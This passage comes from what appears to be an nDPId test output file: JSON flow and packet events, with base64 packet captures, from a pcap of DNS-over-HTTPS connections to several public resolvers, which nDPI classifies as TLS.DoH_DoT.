kzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="}
00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"}
00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7Fvvp